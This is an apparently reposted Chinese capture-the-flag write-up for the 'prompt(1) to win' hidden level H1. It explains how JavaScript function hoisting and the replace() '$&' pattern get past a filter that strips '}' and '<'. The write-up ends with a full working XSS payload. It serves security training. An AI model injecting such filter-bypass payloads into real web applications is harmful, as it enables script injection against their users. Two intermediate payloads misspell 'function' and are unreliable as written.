1
【prompt(1) to win】 Level H1 - Hoisting
source link: https://exp-blog.com/safe/ctf/prompt/level-h1-hoisting/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
题目(隐藏关卡)
javascript
function escape(input) {
// WORLD -1
// strip off certain characters from breaking conditional statement
input = input.replace(/[}<]/g, '');
return ' \n\
<script> \n\
if (history.length > 1337) { \n\
// you can inject any code here \n\
// as long as it will be executed \n\
{{injection}} \n\
} \n\
</script> \n\
'.replace('{{injection}}', input);
}从代码可以知道,注入点在 if 内部,很自然有三种思路:
- 使得
history.length > 1337条件成立 - 闭合
if - 闭合
<script>
但是由于 } 和 < 被过滤了,因此不论闭合 if 还是 <script> 都是不可能的,剩下的方法就是想办法令到 history.length > 1337 条件成立。
这三个知识点是这题的解题关键。
关于 history 对象,需要知道的是它不可被直接读写,目前唯一保留的 API 只有 4 个:length 、 back() 、 forward() 、 go() 。
而在本题中用到的 length ,它会在首次打开浏览器窗口的时候置 0 ,每访问一个新得页面自动 +1 。但是这个特性并不能被利用来解题,原因是 length 的上限值是 50,而条件中的目标值是 1337 ,即使我们预先访问了 1337 个页面, length 的值还是 50 ,仍然无法绕过条件。
但这并不意味着毫无办法了:因为 history 说到底就是一个全局对象,我们可以构造一个同名的 history 对象(必定是局部对象)实现对全局对象的覆盖。同时只要所构造的这个 history 局部对象同样具备 length 属性,且可以被我们自由控制,那么就能实现 if 条件绕过了。
既然可以使用局部对象覆盖,那么就有两个选择:
- 局部变量(如数组):可以初始化数组的元素个数控制
length属性 - 局部函数 :可以通过声明入参的个数控制
length属性
但是不要忘了,我们的注入点是在 if 里面的,亦即不管我们声明 history 局部函数、还是声明 history 局部变量,都是在 history.length 条件后面的位置,亦即会出现 先使用后声明 的语法错误。
而为了解决这个问题,可以利用 Javascript 中的 Hoisting (提升)机制:在早期的 Javascript 编译器中,会把所有出现在代码中的 变量声明 或 函数声明,全部移到代码的开头。
不过 变量提升 和 函数提升 之间还是存在区别的:
- 变量提升:仅仅是把 声明变量的语句 提升到代码的开头,但是初始化语句还是保留在原有位置不变的,如果在初始化语句之前就使用了该变量,依然会出现语法错误(变量未定义)
- 函数提升:函数不存在初始化的说法,从而因为提升机制,使得函数只要在任意地方声明过一次,就可以在任何位置调用。
回到这题,由于注入点在 if 里面,所有我们应该选择函数提升,而不是变量提升。
Javascript 的 Hoisting 机制仅在早期的编译器支持,现在 2019 年绝大部分浏览器都不会这样做了,经测试只有 IE10 还支持这种机制,换言之要用 Hoisting 机制解题,只能使用 IE10 浏览器。
构造 payload
根据前面的思路,我们构造 payload 的方法为:在注入点声明一个 history 局部函数,函数入参数量至少为 1338 ,就能使得 if 条件成立,从而执行我们注入的代码。
例如 payload 为:
javascript
funcation history(a1, a2, a3, ......, a1338) { /* any codes */ } prompt(1);不过这个 payload 有个问题:就是我们要构造 history 函数,就需要使用到花括号 { } ,但是 } 已经被题目过滤了 !换言之我们不能直接输入 } 。
不能直接输入,但是可以间接输入。
绕过的方法需要利用到题目 JS 的 replace('{{injection}}', input) 函数的语法,第二个由我们控制的参数 input 是可以插入特殊变量名以达到某些效果的(详见 这里 ):
而我们要使用的特殊变量名,就是
$& // 这个变量名的效果是 【插入当前匹配的子串自身】。就这题而言,因为 replace('{{injection}}', input) 被匹配的子串必定是 {{injection}},利用 $& 将其插入到我们的 payload ,就能获得两对花括号 {{ }} 了,而里面的一对花括号会被编译器认为是局部代码块,因此并不会影响语法。
所以我们应该构造的 payload 为 :
javascript
funcation history(a1, a2, a3, ......, a1338) $& prompt(1);当这个 payload 经过题目的 replace('{{injection}}', input) 函数处理,就会得到我们想要的效果:
javascript
<script>
if (history.length > 1337) {
funcation history(a1, a2, a3, ......, a1338) {{injection}} prompt(1);
}
</script>最后,输入这个 payload 到 IE10 即可完成挑战:
javascript
function history(a1,a2,a3,a4,a5,a6,a7,a8,a9,a10,a11,a12,a13,a14,a15,a16,a17,a18,a19,a20,a21,a22,a23,a24,a25,a26,a27,a28,a29,a30,a31,a32,a33,a34,a35,a36,a37,a38,a39,a40,a41,a42,a43,a44,a45,a46,a47,a48,a49,a50,a51,a52,a53,a54,a55,a56,a57,a58,a59,a60,a61,a62,a63,a64,a65,a66,a67,a68,a69,a70,a71,a72,a73,a74,a75,a76,a77,a78,a79,a80,a81,a82,a83,a84,a85,a86,a87,a88,a89,a90,a91,a92,a93,a94,a95,a96,a97,a98,a99,a100,a101,a102,a103,a104,a105,a106,a107,a108,a109,a110,a111,a112,a113,a114,a115,a116,a117,a118,a119,a120,a121,a122,a123,a124,a125,a126,a127,a128,a129,a130,a131,a132,a133,a134,a135,a136,a137,a138,a139,a140,a141,a142,a143,a144,a145,a146,a147,a148,a149,a150,a151,a152,a153,a154,a155,a156,a157,a158,a159,a160,a161,a162,a163,a164,a165,a166,a167,a168,a169,a170,a171,a172,a173,a174,a175,a176,a177,a178,a179,a180,a181,a182,a183,a184,a185,a186,a187,a188,a189,a190,a191,a192,a193,a194,a195,a196,a197,a198,a199,a200,a201,a202,a203,a204,a205,a206,a207,a208,a209,a210,a211,a212,a213,a214,a215,a216,a217,a218,a219,a220,a221,a222,a223,a224,a225,a226,a227,a228,a229,a230,a231,a232,a233,a234,a235,a236,a237,a238,a239,a240,a241,a242,a243,a244,a245,a246,a247,a248,a249,a250,a251,a252,a253,a254,a255,a256,a257,a258,a259,a260,a261,a262,a263,a264,a265,a266,a267,a268,a269,a270,a271,a272,a273,a274,a275,a276,a277,a278,a279,a280,a281,a282,a283,a284,a285,a286,a287,a288,a289,a290,a291,a292,a293,a294,a295,a296,a297,a298,a299,a300,a301,a302,a303,a304,a305,a306,a307,a308,a309,a310,a311,a312,a313,a314,a315,a316,a317,a318,a319,a320,a321,a322,a323,a324,a325,a326,a327,a328,a329,a330,a331,a332,a333,a334,a335,a336,a337,a338,a339,a340,a341,a342,a343,a344,a345,a346,a347,a348,a349,a350,a351,a352,a353,a354,a355,a356,a357,a358,a359,a360,a361,a362,a363,a364,a365,a366,a367,a368,a369,a370,a371,a372,a373,a374,a375,a376,a377,a378,a379,a380,a381,a382,a383,a384,a385,a386,a387,a388,a389,a390,a391,a392,a393,a394,a395,a396,a397,a398,a399,a400,a401,a402,a403,a404,a405,a406,a407,a408,a409,a410,a411,a412,a413,a414,a415,a416,a417,a418,a419,a420,a421,a422,a423,a424,a425,a426,a427,a428,a429,a430,a431,a432,a433,a434,a435,a436,a437,a438,a439,a440,a441,a442,a443,a444,a445,a446,a447,a448,a449,a450,a451,a452,a453,a454,a455,a456,a457,a458,a459,a460,a461,a462,a463,a464,a465,a466,a467,a468,a469,a470,a471,a472,a473,a474,a475,a476,a477,a478,a479,a480,a481,a482,a483,a484,a485,a486,a487,a488,a489,a490,a491,a492,a493,a494,a495,a496,a497,a498,a499,a500,a501,a502,a503,a504,a505,a506,a507,a508,a509,a510,a511,a512,a513,a514,a515,a516,a517,a518,a519,a520,a521,a522,a523,a524,a525,a526,a527,a528,a529,a530,a531,a532,a533,a534,a535,a536,a537,a538,a539,a540,a541,a542,a543,a544,a545,a546,a547,a548,a549,a550,a551,a552,a553,a554,a555,a556,a557,a558,a559,a560,a561,a562,a563,a564,a565,a566,a567,a568,a569,a570,a571,a572,a573,a574,a575,a576,a577,a578,a579,a580,a581,a582,a583,a584,a585,a586,a587,a588,a589,a590,a591,a592,a593,a594,a595,a596,a597,a598,a599,a600,a601,a602,a603,a604,a605,a606,a607,a608,a609,a610,a611,a612,a613,a614,a615,a616,a617,a618,a619,a620,a621,a622,a623,a624,a625,a626,a627,a628,a629,a630,a631,a632,a633,a634,a635,a636,a637,a638,a639,a640,a641,a642,a643,a644,a645,a646,a647,a648,a649,a650,a651,a652,a653,a654,a655,a656,a657,a658,a659,a660,a661,a662,a663,a664,a665,a666,a667,a668,a669,a670,a671,a672,a673,a674,a675,a676,a677,a678,a679,a680,a681,a682,a683,a684,a685,a686,a687,a688,a689,a690,a691,a692,a693,a694,a695,a696,a697,a698,a699,a700,a701,a702,a703,a704,a705,a706,a707,a708,a709,a710,a711,a712,a713,a714,a715,a716,a717,a718,a719,a720,a721,a722,a723,a724,a725,a726,a727,a728,a729,a730,a731,a732,a733,a734,a735,a736,a737,a738,a739,a740,a741,a742,a743,a744,a745,a746,a747,a748,a749,a750,a751,a752,a753,a754,a755,a756,a757,a758,a759,a760,a761,a762,a763,a764,a765,a766,a767,a768,a769,a770,a771,a772,a773,a774,a775,a776,a777,a778,a779,a780,a781,a782,a783,a784,a785,a786,a787,a788,a789,a790,a791,a792,a793,a794,a795,a796,a797,a798,a799,a800,a801,a802,a803,a804,a805,a806,a807,a808,a809,a810,a811,a812,a813,a814,a815,a816,a817,a818,a819,a820,a821,a822,a823,a824,a825,a826,a827,a828,a829,a830,a831,a832,a833,a834,a835,a836,a837,a838,a839,a840,a841,a842,a843,a844,a845,a846,a847,a848,a849,a850,a851,a852,a853,a854,a855,a856,a857,a858,a859,a860,a861,a862,a863,a864,a865,a866,a867,a868,a869,a870,a871,a872,a873,a874,a875,a876,a877,a878,a879,a880,a881,a882,a883,a884,a885,a886,a887,a888,a889,a890,a891,a892,a893,a894,a895,a896,a897,a898,a899,a900,a901,a902,a903,a904,a905,a906,a907,a908,a909,a910,a911,a912,a913,a914,a915,a916,a917,a918,a919,a920,a921,a922,a923,a924,a925,a926,a927,a928,a929,a930,a931,a932,a933,a934,a935,a936,a937,a938,a939,a940,a941,a942,a943,a944,a945,a946,a947,a948,a949,a950,a951,a952,a953,a954,a955,a956,a957,a958,a959,a960,a961,a962,a963,a964,a965,a966,a967,a968,a969,a970,a971,a972,a973,a974,a975,a976,a977,a978,a979,a980,a981,a982,a983,a984,a985,a986,a987,a988,a989,a990,a991,a992,a993,a994,a995,a996,a997,a998,a999,a1000,a1001,a1002,a1003,a1004,a1005,a1006,a1007,a1008,a1009,a1010,a1011,a1012,a1013,a1014,a1015,a1016,a1017,a1018,a1019,a1020,a1021,a1022,a1023,a1024,a1025,a1026,a1027,a1028,a1029,a1030,a1031,a1032,a1033,a1034,a1035,a1036,a1037,a1038,a1039,a1040,a1041,a1042,a1043,a1044,a1045,a1046,a1047,a1048,a1049,a1050,a1051,a1052,a1053,a1054,a1055,a1056,a1057,a1058,a1059,a1060,a1061,a1062,a1063,a1064,a1065,a1066,a1067,a1068,a1069,a1070,a1071,a1072,a1073,a1074,a1075,a1076,a1077,a1078,a1079,a1080,a1081,a1082,a1083,a1084,a1085,a1086,a1087,a1088,a1089,a1090,a1091,a1092,a1093,a1094,a1095,a1096,a1097,a1098,a1099,a1100,a1101,a1102,a1103,a1104,a1105,a1106,a1107,a1108,a1109,a1110,a1111,a1112,a1113,a1114,a1115,a1116,a1117,a1118,a1119,a1120,a1121,a1122,a1123,a1124,a1125,a1126,a1127,a1128,a1129,a1130,a1131,a1132,a1133,a1134,a1135,a1136,a1137,a1138,a1139,a1140,a1141,a1142,a1143,a1144,a1145,a1146,a1147,a1148,a1149,a1150,a1151,a1152,a1153,a1154,a1155,a1156,a1157,a1158,a1159,a1160,a1161,a1162,a1163,a1164,a1165,a1166,a1167,a1168,a1169,a1170,a1171,a1172,a1173,a1174,a1175,a1176,a1177,a1178,a1179,a1180,a1181,a1182,a1183,a1184,a1185,a1186,a1187,a1188,a1189,a1190,a1191,a1192,a1193,a1194,a1195,a1196,a1197,a1198,a1199,a1200,a1201,a1202,a1203,a1204,a1205,a1206,a1207,a1208,a1209,a1210,a1211,a1212,a1213,a1214,a1215,a1216,a1217,a1218,a1219,a1220,a1221,a1222,a1223,a1224,a1225,a1226,a1227,a1228,a1229,a1230,a1231,a1232,a1233,a1234,a1235,a1236,a1237,a1238,a1239,a1240,a1241,a1242,a1243,a1244,a1245,a1246,a1247,a1248,a1249,a1250,a1251,a1252,a1253,a1254,a1255,a1256,a1257,a1258,a1259,a1260,a1261,a1262,a1263,a1264,a1265,a1266,a1267,a1268,a1269,a1270,a1271,a1272,a1273,a1274,a1275,a1276,a1277,a1278,a1279,a1280,a1281,a1282,a1283,a1284,a1285,a1286,a1287,a1288,a1289,a1290,a1291,a1292,a1293,a1294,a1295,a1296,a1297,a1298,a1299,a1300,a1301,a1302,a1303,a1304,a1305,a1306,a1307,a1308,a1309,a1310,a1311,a1312,a1313,a1314,a1315,a1316,a1317,a1318,a1319,a1320,a1321,a1322,a1323,a1324,a1325,a1326,a1327,a1328,a1329,a1330,a1331,a1332,a1333,a1334,a1335,a1336,a1337,a1338) $& prompt(1);
- payload.js : 下载
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK